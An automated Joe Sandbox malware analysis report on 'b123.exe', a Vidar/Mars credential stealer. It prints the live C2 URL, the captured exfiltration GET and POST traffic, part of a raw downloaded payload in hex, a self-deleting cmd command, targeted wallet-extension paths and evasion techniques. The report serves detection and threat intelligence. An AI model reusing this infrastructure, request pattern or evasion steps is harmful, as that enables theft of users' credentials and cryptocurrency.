Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
b123.exe

Overview

General Information

Sample Name:b123.exe
Analysis ID:594632
MD5:2e89a7aae558e9be86042e2bd7e65803
SHA1:64e85269651f0a475d0a94eb98cd3adbf3061e10
SHA256:7022a16d455a3ad78d0bbeeb2793cb35e48822c3a0a8d9eaa326ffc91dd9e625
Tags:exeMarsStealerMarsStealer
Infos:

Detection

CryptOne Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected CryptOne packer
Yara detected Vidar stealer
Detected CryptOne packer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Found evasive API chain (may stop execution after checking mutex)
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Self deletion via cmd delete
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found evasive API chain (may stop execution after checking locale)
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Del in CommandLine
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Contains functionality to read the PEB
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • b123.exe (PID: 2140 cmdline: "C:\Users\user\Desktop\b123.exe" MD5: 2E89A7AAE558E9BE86042E2BD7E65803)
    • cmd.exe (PID: 5844 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6500 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup
{"C2 url": "http://sughicent.com/blaka.php"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.454190962.0000000002070000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
    00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

        There are no malicious signatures, click here to show all signatures.

        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\b123.exe" , ParentImage: C:\Users\user\Desktop\b123.exe, ParentProcessId: 2140, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit, ProcessId: 5844
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\b123.exe" , ParentImage: C:\Users\user\Desktop\b123.exe, ParentProcessId: 2140, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit, ProcessId: 5844

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 0.2.b123.exe.20b0000.1.raw.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://sughicent.com/blaka.php"}
        Source: b123.exeReversingLabs: Detection: 33%
        Source: http://sughicent.com/requestAvira URL Cloud: Label: malware
        Source: b123.exeJoe Sandbox ML: detected
        Source: 0.2.b123.exe.20b0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00408E30 CryptUnprotectData,LocalAlloc,LocalFree,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00405450 memset,CryptStringToBinaryA,CryptStringToBinaryA,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_004090C0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00408AB0 CryptUnprotectData,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00408D90 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,

        Compliance

        barindex
        Source: C:\Users\user\Desktop\b123.exeUnpacked PE file: 0.2.b123.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\b123.exeUnpacked PE file: 0.2.b123.exe.60900000.2.unpack
        Source: b123.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

        Networking

        barindex
        Source: Malware configuration extractorURLs: http://sughicent.com/blaka.php
        Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
        Source: global trafficHTTP traffic detected: GET /blaka.php HTTP/1.1Host: sughicent.comConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /request HTTP/1.1Host: sughicent.comCache-Control: no-cacheCookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
        Source: global trafficHTTP traffic detected: POST /blaka.php HTTP/1.1Content-Type: multipart/form-data; boundary=----2DJEKNYUK6F3E3EKHost: sughicent.comContent-Length: 93933Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
        Source: Joe Sandbox ViewIP Address: 5.63.155.126 5.63.155.126
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Tue, 22 Mar 2022 22:52:03 GMTContent-Type: application/octet-streamContent-Length: 1565849Last-Modified: Mon, 21 Feb 2022 16:34:00 GMTConnection: keep-aliveETag: "6213bef8-17e499"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0d 7a 3e 54 c5 85 06 76 05 31 01 00 d0 35 02 00 0c 00 00 00 73 6f 66 74 6f 6b 6e 33 2e 64 6c 6c ec 5b 7d 78 14 45 9a ef 9e 99 84 49 98 64 1a 48 30 3c 04 09 6c f0 b2 8a 18 18 58 12 09 18 20 9d 8d 42 60 d8 81 99 04 c8 07 5f 3a 8e 01 42 9c c6 9c 4f 50 d8 c9 28 b3 cd 78 78 8b 0a b7 ec 0a 0a 1e 77 b2 ae ab a0 39 37 a7 e3 05 49 60 05 f9 d2 45 c5 5d 5c 61 af 71 b2 4b 74 73 31 ba 39 fa de aa ea ee 99 ae ee e4 f4 b9 7f 8f e7 c1 aa a9 fe d5 fb fe de 8f 7a ab aa 1b 2b 97 ef 64 ac 0c c3 d8 e0 af 2c 33 4c 1b 43 fe 94 32 df e2 0f cb 30 99 e3 df c8 64 8e a4 9d 9a d0 c6 2e 3c 35 61 a9 ff fe 07 f3 1a 9b 36 de d7 b4 6a 7d de 9a 55 1b 36 6c 0c e6 ad 5e 97 d7 24 6c c8 bb 7f 43 5e d9 62 4f de fa 8d 6b d7 4d c9 c8 48 cf 57 44 3c d7 90 9f fb a7 8c 7b 16 ab 7f af 0b 1f 2e fe 1c da bb 36 2e 58 74 05 b7 77 2b ed e2 45 dd b8 5d b4 e8 cf d0 1e 5b 4f 9e df be 61 c1 a2 ab 78 ee 82 c5 8f e0 df 8b 16 7d 89 db 7b 16 fd 27 6e 8f 2e 26 6d 05 fe fd a3 fb d7 f8 91 1e d5 04 37 cf 30 0b d9 14 e6 ad d5 f1 15 ea d8 65 66 e2 84 e1 6c e6 70 e6 35 30 70 35 19 7b a6 1d fa 1c 74 ce b0 e8 27 87 fb 16 86 49 65 f0 6f ad 65 dc 16 ec cc b4 5f 5b e0 71 29 99 c4 31 4c a2 25 0d 67 b5 30 87 a0 6d 83 b6 0b 0d 16 5a 98 66 6b 92 6f 73 2c cc 99 71 28 10 16 a6 3e 13 d4 de 60 99 a5 cc e0 7f 0a 64 56 1f 33 e0 d9 60 19 1c 3f 25 b8 ae 39 08 ed 6f 8f 10 8a d8 56 9b 1e 93 c7 30 f5 53 9a d6 ae 0a ae 62 98 f4 32 c5 f6 72 68 df 60 93 61 48 6f e9 14 02 63 98 61 68 a2 45 91 65 a1 71 b1 29 4d 0f 36 ad 61 18 62 6b a1 82 b3 19 70 a5 53 9a d6 35 6c 5c c3 60 db 91 0f 30 47 bb 01 37 8f f9 ff 3f ff a7 3f cb c4 ee fd 2b 27 5a b8 70 4c 18 29 cd cc 62 98 70 2c 68 73 c5 6a 3a f0 68 8d bc ef 65 56 07 1a 25 8d 24 a0 94 50 97 9c 40 b5 eb 51 99 52 f7 28 84 12 1c 2a 00 a5 59 4d 87 4e d0 89 51 26 82 da 58 8a d3 f3 a3 0c 9c ea 9b 75 72 b6 99 c9 69 65 28 42 2b 08 a1 34 55 46 0b c5 66 96 99 94 ad 20 25 21 22 87 88 18 8e 47 e4 7d 05 40 b5 23 41 f4 9b 91 84 28 08 e8 50 10 3b 2c 14 89 0f 46 ea bd b2 d3 82 bc 12 9a 84 7e 32 fe 77 cf b1 9c 9c 5d 02 ff ad 16 33 aa d0 9c 13 41 07 c0 ed 4b e4 ec 95 68 34 34 09 8d 32 5e df 9b 31 f8 f9 56 3d fc 38 78 f0 60 5d 6d 87 ce 63 9b 46 1a a3 b8 d2 42 45 71 e1 48 13 73 fd 34 df 5b 28 be f5 16 43 14 ad 66 82 d6 d2 82 3e 19 a1 17 e4 b6 1a 04 bd 31 c2 44 50 85 95 e2 bd cb 0c 55 45 a3 36 98 a1 96 5a a9 d4 aa 18 61 4c 2d bf 4e ce 2d 26 72 ea 83 3a cb ac 23 f4 79 d5 40 99 f5 19 67 22 a2 51 07 89 99 41 26 eb 20 3f 37 83 14 e8 20 0f 9b 41 38 1d c4 67 02 d9 77 88 4e 8d a9 66 82 b2 74 90 4c 33 48 8e 0e 12 77 9a e8 ba 40 17 93 77 cc 50 17 69 d4 b3 66 a8 4b 34 ea ef cd 50 a5 74 6a 78 cc 50 25 34 ea 76 33 d4 4a 1a 35 cc 0c d5 45 f3 fa 34 d3 04 75 86 ae 73 bf c9 34 ae da 02 7a 19 3d 9d a9 5f 46 d3 8d eb f1 41 33 6d 03 16 4a 5b
        Source: b123.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: b123.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: b123.exeString found in binary or memory: http://ocsp.sectigo.com0
        Source: 4OZ5FKFU.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: 4OZ5FKFU.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: 4OZ5FKFU.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: 4OZ5FKFU.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 4OZ5FKFU.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: 4OZ5FKFU.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
        Source: 4OZ5FKFU.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: b123.exeString found in binary or memory: https://sectigo.com/CPS0D
        Source: 4OZ5FKFU.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: unknownHTTP traffic detected: POST /blaka.php HTTP/1.1Content-Type: multipart/form-data; boundary=----2DJEKNYUK6F3E3EKHost: sughicent.comContent-Length: 93933Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
        Source: unknownDNS traffic detected: queries for: sughicent.com
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
        Source: global trafficHTTP traffic detected: GET /blaka.php HTTP/1.1Host: sughicent.comConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /request HTTP/1.1Host: sughicent.comCache-Control: no-cacheCookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
        Source: b123.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0041B020
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00410F00
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0041A190
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0041A790
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0041A5A0
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_004107B0
        Source: C:\Users\user\Desktop\b123.exeCode function: String function: 004054F0 appears 580 times
        Source: b123.exe, 00000000.00000000.426208275.0000000000433000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejaureg.exe\ vs b123.exe
        Source: b123.exeBinary or memory string: OriginalFilenamejaureg.exe\ vs b123.exe
        Source: b123.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: b123.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: b123.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: b123.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: b123.exeReversingLabs: Detection: 33%
        Source: b123.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\b123.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\b123.exe "C:\Users\user\Desktop\b123.exe"
        Source: C:\Users\user\Desktop\b123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
        Source: C:\Users\user\Desktop\b123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
        Source: C:\Users\user\Desktop\b123.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Users\user\Desktop\b123.exeFile created: C:\Users\user\Desktop\GLFUAS2VJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/4@1/1
        Source: C:\Users\user\Desktop\b123.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4492:120:WilError_01
        Source: C:\Users\user\Desktop\b123.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\b123.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: b123.exeStatic PE information: More than 200 imports for USER32.dll

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\b123.exeUnpacked PE file: 0.2.b123.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\b123.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AA5B6A80-B834-11D0-932F-00A0C90DCAA9}
        Source: C:\Users\user\Desktop\b123.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AA5B6A80-B834-11D0-932F-00A0C90DCAA9}
        Source: C:\Users\user\Desktop\b123.exeUnpacked PE file: 0.2.b123.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\b123.exeUnpacked PE file: 0.2.b123.exe.60900000.2.unpack
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
        Source: b123.exeStatic PE information: real checksum: 0x3b375 should be: 0x3cf40
        Source: initial sampleStatic PE information: section name: .text entropy: 7.5186416062

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\Desktop\b123.exeProcess created: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit
        Source: C:\Users\user\Desktop\b123.exeProcess created: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\b123.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\b123.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\b123.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
        Source: C:\Users\user\Desktop\b123.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
        Source: C:\Users\user\Desktop\b123.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
        Source: C:\Users\user\Desktop\b123.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00408370
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\b123.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00408370
